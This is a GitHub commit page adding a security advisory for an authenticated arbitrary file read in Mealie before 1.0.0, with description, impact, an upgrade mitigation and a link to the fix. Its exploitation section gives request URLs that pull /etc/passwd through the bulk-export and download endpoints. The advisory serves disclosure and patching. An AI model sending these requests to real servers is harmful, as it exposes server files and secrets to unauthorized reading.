Skip to content

Commit 3c6422b

Browse files
Yaniv-gitYaniv-git
committed
add advisory
1 parent cff6c3d commit 3c6422b

File tree

1 file changed

+31
-0
lines changed

1 file changed

+31
-0
lines changed

source/_posts/Authenticated Arbitrary File Read in Mealie.md

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
---
2+
title: "Authenticated Arbitrary File Read in Mealie"
3+
date: 2024-01-29
4+
tags:
5+
- "arbitrary file read"
6+
advisory: true
7+
origin:
8+
cves:
9+
- CVE-2024-
10+
ghsas:
11+
---
12+
# Description
13+
Mealie before version 1.0.0 is vulnerable to authenticated arbitrary file read due to improper validation of the path in the `/api/recipes/bulk-actions/export/download` and `/api/utils/download` endpoints.
14+
15+
# Explotation
16+
1. Fetch a valid JWT token from the URL:
17+
`http://Mealie-domain/api/recipes/bulk-actions/export/download?p
18+
ath=%2Fetc%2Fpasswd`
19+
2. Download the file using the JWT token provided:
20+
`http://Mealie-domain/api/utils/download?token=<TOKEN>`
21+
22+
# Impact
23+
Any authenticated user can generate an API token and thus access the API. Using this
24+
vulnerability, an authenticated attacker can read arbitrary files from the server leading to
25+
different impacts from confidentiality to RCE via secrets/keys exfiltration.
26+
27+
# Mitigation
28+
Upgrade Mealie to version `1.0.0` or later
29+
30+
# References
31+
* [Pull request](https://github.com/mealie-recipes/mealie/pull/2867)

0 commit comments

Comments
 (0)